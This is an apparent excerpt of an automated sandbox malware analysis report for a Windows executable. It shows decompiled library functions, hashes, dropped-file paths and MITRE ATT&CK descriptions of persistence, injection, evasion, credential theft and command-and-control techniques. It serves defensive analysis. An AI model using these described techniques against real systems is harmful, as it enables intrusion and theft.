__CxxThrowException@8.LIBCMT ref: 00CA5CDE

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

AllocatorBase: requested size would cause integer overflow, xrefs: 00CA5CAF

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: AllocatorBase: requested size would cause integer overflow
API String ID: 1139647276-10355266
Opcode ID: fd39d48ba2698574478e2eebd6f24edfbc02fca89015f1002eeb7175e13da129
Instruction ID: 5c4e0011142aaaf2df738b2c80c56a14248ca9c3534a613fce0f256d8d152cb6
Opcode Fuzzy Hash: fd39d48ba2698574478e2eebd6f24edfbc02fca89015f1002eeb7175e13da129
Instruction Fuzzy Hash: F2E06570940318AACF00FAE0D802ADC77B4AF64725F902255E929BA0C1CBB09748C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5E62 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00CA5E62(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t19;
				void* _t23;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				intOrPtr* _t36;
				void* _t38;

				0xe21503(0x44);
				 *((intOrPtr*)( *__ecx + 0x9c))();
				E00CA1E2C(_t38 - 0x28, "BufferedTransformation: this object is not attachable");
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t26 = _t38 - 0x50;
				E00CA4197(_t26);
				 *((intOrPtr*)(_t38 - 0x50)) = 0xe92cb4;
				0xe2143b(_t38 - 0x50, 0xee8098, 0, _t38 - 0x28);
				asm("int3");
				_t36 = _t26;
				_t19 = 0;
				_t28 =  *_t36 - 0x10;
				_t33 =  *_t28;
				if( *((intOrPtr*)(_t28 + 4)) != 0) {
					if( *((intOrPtr*)(_t28 + 0xc)) >= 0) {
						E00CA656C(_t28, __edx);
						_t19 =  *((intOrPtr*)( *_t33 + 0xc))() + 0x10;
						 *_t36 = _t19;
					} else {
						_t19 = E00CA669E(_t23, _t36, _t33, 0);
					}
				}
				return _t19;
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5E69

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5EA5

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

BufferedTransformation: this object is not attachable, xrefs: 00CA5E76

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: BufferedTransformation: this object is not attachable
API String ID: 1139647276-3944187330
Opcode ID: da97efa9cafebcd71e008122a8657a66c01313183c6134caaeabcf084ace1740
Instruction ID: 7fa9b092a930615919e3df53e0f8883696a42a85677e1a614f5a604b4d09afad
Opcode Fuzzy Hash: da97efa9cafebcd71e008122a8657a66c01313183c6134caaeabcf084ace1740
Instruction Fuzzy Hash: FEE01A70950218EBDF04EBE0C84AFDC77B8AF54304F502468F609BA191DBB05A09CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CA5D7B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00CA5D7B(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				char _v40;
				char _v80;

				0xe21503(0x44);
				E00CA1E2C( &_v40, "Clone() is not implemented yet.");
				_v4 = _v4 & 0x00000000;
				E00CA4197( &_v80);
				_v80 = 0xe92cb4;
				0xe2143b( &_v80, 0xee8098, 0,  &_v40);
				asm("int3");
				_t18 = _v4;
				if(_v4 == 0xffffffff) {
					_t18 = E00CA67CE(_a12) + 1;
				}
				return E00CAB1AA(_t18, _a4, _a8, _a12, _t18);
			}

0x00ca5d82
0x00ca5d8f
0x00ca5d94
0x00ca5da1
0x00ca5dae
0x00ca5db6
0x00ca5dbb
0x00ca5dbf
0x00ca5dc5
0x00ca5dd0
0x00ca5dd0
0x00ca5de4

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA5D82

Part of subcall function 00CA4197: __EH_prolog3.LIBCMT ref: 00CA419E

__CxxThrowException@8.LIBCMT ref: 00CA5DB6

Part of subcall function 00E2143B: RaiseException.KERNEL32(?,?,00E48B64,?,?,?,?,?,?,?,00E48B64,?,00EF8AB8,?), ref: 00E21490

Strings

Clone() is not implemented yet., xrefs: 00CA5D87

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ExceptionException@8H_prolog3H_prolog3_RaiseThrow
String ID: Clone() is not implemented yet.
API String ID: 1139647276-226299721
Opcode ID: 446b446183e82ba2907f171d43a09fb02d34bb54700e54d0ff93b01fd0b7e108
Instruction ID: 49e1bcfcf783cbf968383f4a6ea520966fed2ede81621b70fbd4a045b8ece8f6
Opcode Fuzzy Hash: 446b446183e82ba2907f171d43a09fb02d34bb54700e54d0ff93b01fd0b7e108
Instruction Fuzzy Hash: D7E0B67495021CAADF04EBE0C856BDDB7B8AB64705F502458E605B6181DBB05A08C621

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1C8C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CA1C8C(void* __eax) {
				void* _t2;
				void* _t7;

				0xe29150(0xed1360);
				_t2 = E00CA24AE(0xf03b2c, _t7, 0xed1360, __eax);
				0xe20d99(0xe8db5e);
				return _t2;
			}

0x00ca1c93
0x00ca1ca0
0x00ca1caa
0x00ca1cb1

APIs

_strlen.LIBCMT ref: 00CA1C93

Strings

AAD, xrefs: 00CA1C9B
AAD, xrefs: 00CA1C8D, 00CA1C92, 00CA1C9A

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _strlen
String ID: AAD$AAD
API String ID: 4218353326-3502023328
Opcode ID: ea8015a7b96da6ffebf2ae0e94d5872de054aeaca68478615548374634d9fc88
Instruction ID: 7b78ce67753533f965e98179a0fa5f395a4a5bc24dc9f01bb6adec7e388ff57c
Opcode Fuzzy Hash: ea8015a7b96da6ffebf2ae0e94d5872de054aeaca68478615548374634d9fc88
Instruction Fuzzy Hash: 80C04C5661A6393D150431E87C179AA028DDD863647132067F408766C35C812D4161B9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 38b2c7a1af454d382927f81543d86055886bc02863457.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\d

C:\Users\user\Desktop\d.INTEG.RAW

C:\Users\user\Desktop\d.jfm

C:\Users\user\Desktop\tmp.edb

C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe

C:\Users\user\Documents\VlcpVideoV1.0.1\38b2c7a1af454d382927f81543d86055886bc02863457.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
38b2c7a1af454d382927f81543d86055886bc02863457.exe

Function 00CACD24 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 489
COMMON

Function 00D3347C Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 382
stringCOMMON

Function 00D3398F Relevance: 63.3, APIs: 42, Instructions: 316
COMMON

Function 00D0D10E Relevance: 19.6, APIs: 13, Instructions: 148
memoryCOMMON

Function 00CAE2BF Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 192
COMMON

Function 00CADCF2 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 344
COMMON

Function 00CA7A14 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94
COMMON

Function 00DC19EB Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 38
COMMON

Function 00D3302F Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Function 00E25A96 Relevance: 6.1, APIs: 4, Instructions: 136
COMMONLIBRARYCODE

Function 00E56ED3 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Function 00E56FFF Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Function 00E6CFA7 Relevance: 6.0, APIs: 4, Instructions: 40
COMMONLIBRARYCODE

Function 00D0E1D5 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Function 00E6F3B3 Relevance: 6.0, APIs: 4, Instructions: 32
COMMONLIBRARYCODE

Function 00CA3949 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMON

Function 00CA3B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Function 00CA3AEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Function 00CA5071 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Function 00D32364 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 00CA5140 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON